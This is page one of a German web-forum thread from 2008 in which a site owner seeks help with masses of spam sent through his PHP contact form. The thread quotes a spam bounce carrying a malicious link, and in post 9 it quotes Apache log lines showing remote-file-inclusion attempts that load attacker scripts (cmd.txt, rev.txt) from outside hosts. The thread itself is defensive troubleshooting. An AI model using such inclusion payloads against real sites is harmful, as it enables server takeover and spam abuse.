Seite 1 von 4 123 ... LetzteLetzte
Ergebnis 1 bis 10 von 34

Thema: Spam Mails ohne Ende obwohl Kontaktformular offline

  1. #1
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard Spam Mails ohne Ende obwohl Kontaktformular offline

    Hallo Leute,
    brauche dringend hilfe da ich unglaublich viele e-Mails pro Minute bekomme.

    Anscheind kommen die e-Mails von einem Kontaktformular auf meiner HP.
    Nun ist die HP offline geschaltet aber ich bekomme immer noch so viele
    E-Mails. Bitte Bitte brauche dringend hilfe. Wie kann ich das abstellen.
    Oder hat jemand infos für mich?

    Gruss
    Ko

  2. #2
    Mitglied Avatar von heinerle
    Registriert seit
    07.09.2005
    Beiträge
    776

    Standard

    Zitat Zitat von kojak Beitrag anzeigen
    ...
    Oder hat jemand infos für mich?
    Zuerst brauchen wir mal Infos von Dir:

    Poste doch mal den Header (IP und Servernamen ausXXXen) einer typischen Spammail (benutze dazu den Header-Tag oben rechts im Editor).

    Nun ist die HP offline geschaltet ...
    was verstehst Du unter "offline geschaltet" - Apache läuft nicht mehr oder index.html gelöscht?

  3. #3
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard

    Folgendes ist in der Mail:
    ____________________________________________________


    This message was created automatically by mail delivery software.

    A message that you sent could not be delivered to one or more of its
    recipients. This is a permanent error. The following address(es) failed:


    header:
    01:
    02: SMTP error from remote mailer after RCPT TO::
    03: host mx1.hotmail.com [65.54.245.8]: 550 Requested action not taken:
    04: mailbox unavailable
    05:
    06: ------ This is a copy of the message, including all the headers. ------
    07:
    08: Return-path: <info [at] willichnichtzeigen.de>
    09: Received: from nobody by wpxx.webpack.hosteurope.de running ExIM using local
    10: ID: [ID filtered]
    11: To:
    12: Subject: Te adoro!
    13: X-PHP-Script: [whois]www.willichnichtzeigen.de/anmeldung.php[/whois]
    14: for 2xx.5x.x.1x, 2xx.5x.x.1x
    15: Date: Fri, 7 Mar 2008 xx:xx:xx +0100
    16: From: Marcela <correio [at] correiosonline.com>
    17: Reply-to: Marcela <correio [at] correiosonline.com>
    18: Message-ID: [ID filtered]
    19: Content-Transfer-Encoding: 8bit
    20: Content-Type: text/html; charset="iso-8859-1"
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html><!--309253548481-->
    <head><!--309253548481-->




    <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">




    <title>declaracoes</title>
    </head>


    <!--309253548481--><body>


    <span style="font-family: Microsoft Sans Serif;">Ol&aacute;, n&atilde;o sei nem como come&ccedil;ar este email...<br>
    Fico at&eacute; sem gra&ccedil;a de falar por aqui, me abrir, te falar o que sinto por email<br>
    mas foi a unica maneira que encontrei sem correr o risco de me ferir novamente..<br>
    Juro que voce &eacute; tudo que sonhei pra minha vida, eu adoro estar com voc&Ecirc;<br>


    desculpa esta falando por aqui, mas foi a unica maneira..<br>
    Eu fiz uma animacao com nossas fotos, &nbsp;com maior carinho , espero que goste...<br>
    Vou te conquistar e te ter pra mim, JURO!<br>
    <br>
    AMO VOC&Ecirc;...<br>
    <br>


    <a href="whois:http://www.escuela350-sanpablo.com.ar/modules/Forums/images/subject/ver.php">
    whois:http://animacoes.yahoo.com.br/index.php?dec=Dec0365215</a></span>
    </body>
    </html>




    ____________________________________________________


    Glaub der Server an sich ist offline. Seiten wurden keine gelöscht.
    Hab lediglich die PHP Mail funktionen deaktiviert.

    Gruss
    Ko
    Geändert von mareike26 (07.03.2008 um 14:37 Uhr) Grund: whois//header

  4. #4
    Mitglied Avatar von heinerle
    Registriert seit
    07.09.2005
    Beiträge
    776

    Standard

    und was passiert, wenn Du whois:www.willichnichtzeigen.de/anmeldung.php direkt aufrufst?

    Sofern das Skript noch vorhanden ist darfst Du Dich nicht wundern, daß weitergespamt wird, denn wenn die URL erst mal bekannt ist dann wird sie direkt verwendet, ohne Umweg über irgendwelche darauf verlinkenden Seiten.

    Wenn dies der Fall ist dann benenne das Skript in anmeldung.txt um (oder xghrtz.txt).

  5. #5
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard

    Eigentlich passiert nichts in den Anmeldung.php wenn ich sie aufrufe.
    Dort ist nicht einmal eine Mail Funktion drin.

    Kann es sein das es auch am Provider liegt.
    Ich musste für das Skript bei der Mail Funkion folgendes ranhängen:
    "-f diemailvondiesemserver@hosteurope.de"

    Sonst hat das Skript keine Mails versandt.

    Zu dem Umbenennen der anmeldung.php in anmeldung.txt.:

    Sag mal, reicht es auch wenn ich die mail PHP Funktion einfach
    deaktiviere? Möchte das die Seite trodzem online bleibt.

    Zur Sicherheit des Formulars:
    Nun habe ich schon ein Captcha drin,
    die Eingenben werden Überprüft z.B. auch ob
    Header Befehle wie To: Cc: Bc: etc.
    vorkommen.
    Habe auch zusätzlich ein verstecktes Feld in
    das Formular gelegt, das nicht zu sehen ist und
    leer sein muss vor dem Absenden.

    Weis jemand wie ich mein Mail Formular sicher mache.
    Nun bekomme ich trotzdem schon wieder tausende von Mails.

    Bin dankbar für jeden Hinweis.




    Gruss
    Ko
    Geändert von Kodi (10.03.2008 um 10:22 Uhr)

  6. #6
    Mitglied Avatar von SpamRam
    Registriert seit
    11.09.2005
    Beiträge
    910

    Standard

    Da die Spam-Mails nicht durch Formulareingaben kommen (da wird das Formular gar nicht ausgefüllt), sondern komplett ausgefüllte Formulare direkt an die im Formular angegebene Empfangsadresse gesendet werden, hilft eigentlich nur eines: die Empfangsadresse ändern und auf jeden Fall das Catch-All abschalten (wenn es denn noch läuft).

    Üblich ist z.B. folgende Zeile:

    <input type="HIDDEN" name="recipient" value="anfrage@domain.de">

    Also Mailadresse "anfrage" löschen und stattdessen irgendeine andere Adresse definieren.

    Es nützt überhaupt nichts, jetzt noch alle möglichen Formularabprüfungen einzubauen. Die Prüfungen müssten im Empfangsprogramm erfolgen, auf das man üblicherweise keinen Zugriff hat.

    Diese Prüfroutinen machen nur Sinn, in einem Formular mit geänderter Empfangsadresse.
    Forum-Statistik: 80%: 100x dieselbe Frage! Kaum einer liest, bevor er fragt! 10% zu faul, selbst zu suchen, oder man liest "leudz, lol, oO" und vokalloses SMS-Gestammel. => 90% Ausschuss. 10% helfen weiter, Schreiber hat überlegt, was er schreibt und Rechtschreibung geprüft. Traumhaft :-). [(M.Goldmann, gekürzt, Internet Professionell 4/07)]
    Die deutsche Sprache ist Freeware, jeder darf sie kostenlos nutzen. Sie ist jedoch nicht OpenSource und eigenmächtige Veränderungen sind nicht gestattet.

  7. #7
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Daumen hoch

    Also liegt es garnicht an der Filterung. Ich hab gefiltert bis fast keine Buchstaben mehr durchkahmen.

    Wie bekommen die denn Ihre Formularinfos in die Mail Funktion rein?
    Kapier es nicht.
    Wenn jemand von Hand mein Formular benutzt und spamen möchte, hab
    ich ja dann eigentlich überhaupt keine Chance das zu unterbinden. Oder?


    Nach dem absenden des Formulars muss man eine Minute warten bis zum
    nächsten absenden.Kann der Spamer bzw. der Bot mit einmal abschicken dann tausende von Mails versenden?

    Man muss doch sein Formular irgendwie safe bekommen.
    Captschas bringen es ja auch nicht.
    Hab mir Captscha Bilder augeschaut die von Bots gelesen werden können.
    Ich war baff das die Bots solche Zeichen entziffern können.

    Die Variante mit der Rechenaufgabe ist auch sehr bedenklich.
    Anscheind gibts da nicht so recht ne Antwort auf dieses Problem.

    Danke aber schon mal sehr für die bisherige Infos..


    Eine Sache noch. Kann man sagen das es auch am Provider liegt, das man evt.
    besonders Spam gefährdet ist?

    Kodi

  8. #8
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    ganz einfach machen die das..
    bei den meisten formularen werden die werte durch POST übergeben..
    die senden den aufruf gleich mit, in etwa so:

    http://deineseite.de/kontaktformularabsenden.php&name&emailadresse&foo..
    damit wird der gesamte kram umgangen..
    du solltest mal zu den zeiten, wo die fraglichen mails geschickt wurden durch die apache-logs greppen, da wirst du die antwort finden.
    Quod non est in litteris, non est in munde.

  9. #9
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard

    Merkwürdig...die Umgehen die Post Vars mit den GET Vars?

    Hab grad etwas in den Logs gefunden.
    Kann es sein das über eine GET Variable die Spamattacken
    ausgeführt werden?

    meineseite.php?site=http://www.cmdlist.xpg.com.br/cmd.txt
    oder z.b.
    meineseite.php?site=http://www.vuls2008.kit.net/rev.txt

    in der Zweiten txt steht irgendwie auch was von wegen smtp.

    Ist es das? Und jemand ne Idee wie ich mich davor schützen kann.
    Ich glaub das ist es.

    Bis so dermassen gespannt.

  10. #10
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    das sieht so aus, ja..
    Quod non est in litteris, non est in munde.

Seite 1 von 4 123 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen